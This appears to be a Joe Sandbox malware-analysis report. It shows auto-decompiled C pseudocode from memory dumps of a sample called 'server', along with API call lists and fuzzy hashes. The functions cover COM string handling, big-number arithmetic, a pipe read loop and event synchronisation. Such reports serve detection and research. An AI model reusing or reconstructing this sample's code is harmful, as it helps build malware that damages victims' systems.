            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: AllocateHeapObjectSingleWait
            • String ID: 1~~$vj~$vj~
            • API String ID: 3050739573-403210478
            • Opcode ID: fca48616181cd6848e0e64f5da5da0a8f09ad816cc2fc1d7065394dc5021acfc
            • Instruction ID: 2f7a810a91be04f3459716cd359627500b85679be089768393daefc65a500338
            • Opcode Fuzzy Hash: fca48616181cd6848e0e64f5da5da0a8f09ad816cc2fc1d7065394dc5021acfc
            • Instruction Fuzzy Hash: 4E314B71C0159DEFCF21ABA6CC88DEEFFB9EB58354F204026E515B6110D6784E60DBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E6CDF Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
            Download Yara Rule
            C-Code - Quality: 46%
            			E007E6CDF(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x7ea348; // 0x272d5a8
					_t5 = _t103 + 0x7eb038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x7e9284);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x7ea348; // 0x272d5a8
												_t28 = _t109 + 0x7eb0e4; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x7ea348; // 0x272d5a8
														_t33 = _t79 + 0x7eb078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































            0x007e6ce4
            0x007e6ced
            0x007e6cee
            0x007e6cf2
            0x007e6cf8
            0x007e6cfe
            0x007e6d07
            0x007e6d0d
            0x007e6d17
            0x007e6d19
            0x007e6d1f
            0x007e6d24
            0x007e6d2f
            0x007e6d35
            0x007e6d3a
            0x007e6e5c
            0x007e6d40
            0x007e6d40
            0x007e6d4d
            0x007e6d53
            0x007e6d59
            0x007e6d5d
            0x007e6d63
            0x007e6d70
            0x007e6d74
            0x007e6d7a
            0x007e6d7d
            0x007e6d85
            0x007e6d86
            0x007e6d8a
            0x007e6d8e
            0x007e6d91
            0x007e6d94
            0x007e6d9a
            0x007e6da3
            0x007e6da9
            0x007e6daa
            0x007e6dad
            0x007e6dae
            0x007e6daf
            0x007e6db7
            0x007e6db8
            0x007e6db9
            0x007e6dbb
            0x007e6dbf
            0x007e6dc3
            0x00000000
            0x00000000
            0x007e6dc9
            0x007e6dd2
            0x007e6dd8
            0x007e6de2
            0x007e6de6
            0x007e6de8
            0x007e6df5
            0x007e6df9
            0x007e6e01
            0x007e6e06
            0x007e6e18
            0x007e6e1a
            0x007e6e20
            0x007e6e20
            0x007e6e29
            0x007e6e29
            0x007e6e2b
            0x007e6e31
            0x007e6e31
            0x007e6e34
            0x007e6e3a
            0x007e6e3d
            0x007e6e46
            0x00000000
            0x00000000
            0x00000000
            0x007e6e46
            0x007e6d9a
            0x007e6d94
            0x007e6d7d
            0x007e6e4c
            0x007e6e4c
            0x007e6e52
            0x007e6e52
            0x007e6e58
            0x007e6e58
            0x007e6e61
            0x007e6e67
            0x007e6e67
            0x007e6d24
            0x007e6e70

            APIs
            • SysAllocString.OLEAUT32(007E9284), ref: 007E6D2F
            • lstrcmpW.KERNEL32(00000000,0076006F), ref: 007E6E10
            • SysFreeString.OLEAUT32(00000000), ref: 007E6E29
            • SysFreeString.OLEAUT32(?), ref: 007E6E58
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: String$Free$Alloclstrcmp
            • String ID:
            • API String ID: 1885612795-0
            • Opcode ID: 7adfa113cca7362bc6de67962cfb2ccebb46d355036e3cc133ba95867e388ae7
            • Instruction ID: d03cf2e4408247971114e9754b8672ece5a9cdf20d8ee202346a101521fe4dd9
            • Opcode Fuzzy Hash: 7adfa113cca7362bc6de67962cfb2ccebb46d355036e3cc133ba95867e388ae7
            • Instruction Fuzzy Hash: 14515E75D01509EFCB01DFA8C888DAEB7BAFF8C744B148598E915EB260D735AD41CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E597D Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
            Download Yara Rule
            APIs
            • SysAllocString.OLEAUT32(?), ref: 007E59B8
            • SysFreeString.OLEAUT32(00000000), ref: 007E5A9D
              • Part of subcall function 007E6CDF: SysAllocString.OLEAUT32(007E9284), ref: 007E6D2F
            • SafeArrayDestroy.OLEAUT32(00000000), ref: 007E5AF0
            • SysFreeString.OLEAUT32(00000000), ref: 007E5AFF
              • Part of subcall function 007E77E3: Sleep.KERNEL32(000001F4), ref: 007E782B
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: String$AllocFree$ArrayDestroySafeSleep
            • String ID:
            • API String ID: 3193056040-0
            • Opcode ID: ca77d51e1b6219f21f83afb955793387f4abda763e67e3cfac01137e083ec73c
            • Instruction ID: 17ca753701408c898184fb02a0017ea0b3d94868b3da4c9ed47511ed5371a039
            • Opcode Fuzzy Hash: ca77d51e1b6219f21f83afb955793387f4abda763e67e3cfac01137e083ec73c
            • Instruction Fuzzy Hash: 9B516E76501649EFDB01DFA9C888A9EBBB6FF8C704F248529E505DB220DB38ED45CB50
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E4781 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
            Download Yara Rule
            C-Code - Quality: 85%
            			E007E4781(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E007E61EF(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E007E6725(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E007E7477(_t101,  &_v428, _a8, _t96 - _t81);
					E007E7477(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E007E6725(_t101, 0x7ea1d0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E007E6725(_a16, _a4);
						E007E7894(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L007E82DA();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L007E82D4();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E007E5F09(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E007E6E71(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E007E10A0(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x7ea1d0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















            0x007e4784
            0x007e4790
            0x007e4796
            0x007e479b
            0x007e479f
            0x007e4911
            0x007e4915
            0x007e4915
            0x007e47a5
            0x007e47a9
            0x007e47ad
            0x007e47b0
            0x007e47bb
            0x007e47c1
            0x007e47c6
            0x007e47c9
            0x007e47e3
            0x007e47f2
            0x007e47fe
            0x007e4808
            0x007e480d
            0x007e480f
            0x007e4812
            0x007e48c9
            0x007e48cf
            0x007e48e0
            0x007e48f3
            0x007e4909
            0x00000000
            0x007e490e
            0x007e481b
            0x007e4822
            0x007e4826
            0x007e482c
            0x007e482e
            0x007e4830
            0x007e4832
            0x007e4834
            0x007e483e
            0x007e4843
            0x007e4845
            0x007e4847
            0x007e4848
            0x007e4849
            0x007e484a
            0x007e4851
            0x007e4858
            0x007e485b
            0x007e485b
            0x007e4828
            0x007e4828
            0x007e4828
            0x007e4863
            0x007e486b
            0x007e4877
            0x007e487c
            0x007e487c
            0x007e4881
            0x00000000
            0x00000000
            0x007e4883
            0x007e4886
            0x007e4893
            0x00000000
            0x00000000
            0x007e4895
            0x007e4895
            0x007e48a2
            0x007e487c
            0x007e4881
            0x00000000
            0x00000000
            0x00000000
            0x007e4881
            0x007e48ac
            0x007e48af
            0x007e48b2
            0x007e48b9
            0x007e48b9
            0x007e48c6
            0x00000000
            0x007e48c6
            0x007e47b2
            0x007e47b6
            0x007e47b7
            0x007e47b9
            0x00000000
            0x00000000
            0x00000000
            0x007e47b9
            0x00000000

            APIs
            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 007E4834
            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 007E484A
            • memset.NTDLL ref: 007E48F3
            • memset.NTDLL ref: 007E4909
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: memset$_allmul_aulldiv
            • String ID:
            • API String ID: 3041852380-0
            • Opcode ID: 51e7b0a88840ee257f09858dd7ddf9087a799fa5a5d4de4fc71ee127105ebdf1
            • Instruction ID: ff307f2406dae70b2c9e258d5a7c7d3a17d84a1d1fedd681442be284eafd8f84
            • Opcode Fuzzy Hash: 51e7b0a88840ee257f09858dd7ddf9087a799fa5a5d4de4fc71ee127105ebdf1
            • Instruction Fuzzy Hash: 6E41F531A02298EFDB109F69CC49BDE7775EF4D310F004569F909A7281EB78AE44CB81
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E454F Relevance: 6.1, APIs: 4, Instructions: 112COMMON
            Download Yara Rule
            C-Code - Quality: 39%
            			E007E454F(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t53 = __ecx;
				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0x7ea160() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x7ea174(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E007E33DC(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0x7ea160() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E007E61DA(_v16);
							if(_t58 == 0) {
								_t58 = E007E2B18(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E007E16B2( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E007E16B2( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}














            0x007e454f
            0x007e455e
            0x007e4563
            0x007e4565
            0x007e456a
            0x007e456b
            0x007e4570
            0x007e4571
            0x007e457c
            0x007e45ad
            0x007e45b2
            0x007e4675
            0x007e4678
            0x007e467e
            0x007e467e
            0x007e45bf
            0x007e45c7
            0x007e4672
            0x00000000
            0x007e4672
            0x007e45d2
            0x007e45d7
            0x007e45dc
            0x007e4664
            0x007e4665
            0x007e4665
            0x007e466b
            0x00000000
            0x007e466b
            0x007e45e2
            0x007e45e4
            0x007e45ea
            0x007e45eb
            0x007e45eb
            0x007e45ee
            0x007e45f1
            0x007e45f7
            0x007e45fc
            0x007e45fd
            0x007e4602
            0x007e4605
            0x007e4610
            0x00000000
            0x00000000
            0x007e4618
            0x007e4620
            0x007e4649
            0x007e464c
            0x007e4653
            0x007e465e
            0x007e465e
            0x00000000
            0x007e4653
            0x007e462c
            0x007e4630
            0x00000000
            0x00000000
            0x007e4632
            0x007e4637
            0x00000000
            0x00000000
            0x007e4639
            0x007e4639
            0x007e463e
            0x00000000
            0x00000000
            0x007e4640
            0x007e4641
            0x007e4644
            0x007e4644
            0x007e45eb
            0x007e4584
            0x007e458c
            0x007e45a5
            0x007e45a7
            0x00000000
            0x00000000
            0x00000000
            0x007e45a7
            0x007e4598
            0x007e459c
            0x00000000
            0x00000000
            0x007e45a2
            0x00000000

            APIs
            • ResetEvent.KERNEL32(?), ref: 007E4565
            • GetLastError.KERNEL32 ref: 007E457E
              • Part of subcall function 007E16B2: WaitForMultipleObjects.KERNEL32(00000002,007E7C47,00000000,007E7C47,?,?,?,007E7C47,0000EA60), ref: 007E16CD
            • ResetEvent.KERNEL32(?), ref: 007E45F7
            • GetLastError.KERNEL32 ref: 007E4612
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: ErrorEventLastReset$MultipleObjectsWait
            • String ID:
            • API String ID: 2394032930-0
            • Opcode ID: 9655b630c2de93e97d684d87a8a2ecc506d467597a17ded7a4c979ada5ff220f
            • Instruction ID: 6dac6f1e7c833103baeb9cd41d4d6da3e1f60ee6fa8d7735f0dc936803606bbe
            • Opcode Fuzzy Hash: 9655b630c2de93e97d684d87a8a2ecc506d467597a17ded7a4c979ada5ff220f
            • Instruction Fuzzy Hash: 5731D332A01684FFCB219BA6CC48E6E77B9BF8D350F214568E511D71A0EB34ED459B10
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E49D0 Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
            Download Yara Rule
            C-Code - Quality: 87%
            			E007E49D0(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x7ea310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x7ea348; // 0x272d5a8
				_t3 = _t8 + 0x7eb7b4; // 0x61636f4c
				_t25 = 0;
				_t30 = E007E74EC(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x7ea34c, 1, 0, _t30);
					E007E61DA(_t30);
				}
				_t12 =  *0x7ea2fc; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E007E30D5() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E007E37DF(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x7ea124( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E007E23C4(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














            0x007e49d1
            0x007e49d8
            0x007e49e2
            0x007e49e6
            0x007e49ec
            0x007e49fb
            0x007e4a02
            0x007e4a06
            0x007e4a18
            0x007e4a1a
            0x007e4a1a
            0x007e4a1f
            0x007e4a26
            0x007e4a7d
            0x007e4a7d
            0x007e4a83
            0x007e4a85
            0x007e4a85
            0x007e4a8f
            0x007e4a93
            0x007e4aa5
            0x007e4aa5
            0x007e4aa9
            0x007e4aaf
            0x007e4aaf
            0x00000000
            0x007e4a3f
            0x007e4a44
            0x007e4a4c
            0x007e4a50
            0x007e4a54
            0x007e4a54
            0x007e4a61
            0x007e4a65
            0x007e4a69
            0x007e4abe
            0x007e4ac4
            0x007e4ac4
            0x007e4a77
            0x007e4a7b
            0x007e4ab2
            0x007e4ab4
            0x007e4ab7
            0x007e4ab7
            0x00000000
            0x007e4ab4
            0x007e4a7b
            0x00000000
            0x007e4a65

            APIs
              • Part of subcall function 007E74EC: lstrlen.KERNEL32(00000005,00000000,43175AC3,00000027,00000000,02F19E40,00000000,?,?,43175AC3,00000005,007EA00C,4D283A53,?,?), ref: 007E7522
              • Part of subcall function 007E74EC: lstrcpy.KERNEL32(00000000,00000000), ref: 007E7546
              • Part of subcall function 007E74EC: lstrcat.KERNEL32(00000000,00000000), ref: 007E754E
            • CreateEventA.KERNEL32(007EA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,007E6A95,?,?,?), ref: 007E4A11
              • Part of subcall function 007E61DA: RtlFreeHeap.NTDLL(00000000,00000000,007E6383,00000000,?,00000000,00000000), ref: 007E61E6
            • WaitForSingleObject.KERNEL32(00000000,00004E20,007E6A95,00000000,00000000,?,00000000,?,007E6A95,?,?,?), ref: 007E4A71
            • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,007E6A95,?,?,?), ref: 007E4A9F
            • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,007E6A95,?,?,?), ref: 007E4AB7
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
            • String ID:
            • API String ID: 73268831-0
            • Opcode ID: 3e8d341c8903bbc2f092ca77e9daf3eff2a6211b299dab0c1ea29ca4870c5682
            • Instruction ID: 04dee846db39f544529f6a6440599e88fb9c9c55c95308142236010b433ef51d
            • Opcode Fuzzy Hash: 3e8d341c8903bbc2f092ca77e9daf3eff2a6211b299dab0c1ea29ca4870c5682
            • Instruction Fuzzy Hash: 1021D5336832D1ABC7319B668C88A6B77A9FB8C724B058635FA419B151DB2CDC008758
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E69E6 Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
            Download Yara Rule
            C-Code - Quality: 39%
            			E007E69E6(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E007E2A3D(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E007E28B3(_t23);
						}
					}
					return _t38;
				}
				if(E007E6ADC(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x7ea34c, 1, 0,  *0x7ea3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E007E5704(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E007E4C94(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E007E7220(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E007E49D0( &_v32, _t39);
					goto L13;
				}
			}












            0x007e69e6
            0x007e69f3
            0x007e69f9
            0x007e69fa
            0x007e69fb
            0x007e69fc
            0x007e69fd
            0x007e6a01
            0x007e6a0d
            0x007e6a11
            0x007e6a99
            0x007e6a99
            0x007e6a9c
            0x007e6a9e
            0x007e6aa6
            0x007e6aac
            0x007e6aaf
            0x007e6aaf
            0x007e6aac
            0x007e6aba
            0x007e6aba
            0x007e6a24
            0x007e6a26
            0x007e6a26
            0x007e6a3d
            0x007e6a41
            0x007e6a44
            0x007e6a4f
            0x007e6a56
            0x007e6a56
            0x007e6a5f
            0x007e6a63
            0x007e6a71
            0x007e6a65
            0x007e6a65
            0x007e6a66
            0x007e6a67
            0x007e6a68
            0x007e6a69
            0x007e6a6a
            0x007e6a6a
            0x007e6a76
            0x007e6a79
            0x007e6a7d
            0x007e6a7f
            0x007e6a7f
            0x007e6a86
            0x00000000
            0x007e6a88
            0x007e6a88
            0x007e6a95
            0x00000000
            0x007e6a95

            APIs
            • CreateEventA.KERNEL32(007EA34C,00000001,00000000,00000040,?,?,74D0F710,00000000,74D0F730), ref: 007E6A37
            • SetEvent.KERNEL32(00000000), ref: 007E6A44
            • Sleep.KERNEL32(00000BB8), ref: 007E6A4F
            • CloseHandle.KERNEL32(00000000), ref: 007E6A56
              • Part of subcall function 007E5704: WaitForSingleObject.KERNEL32(00000000,?,?,?,?,00000000,vj~,?,?,?,?,?,007E6A76,?), ref: 007E57DE
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
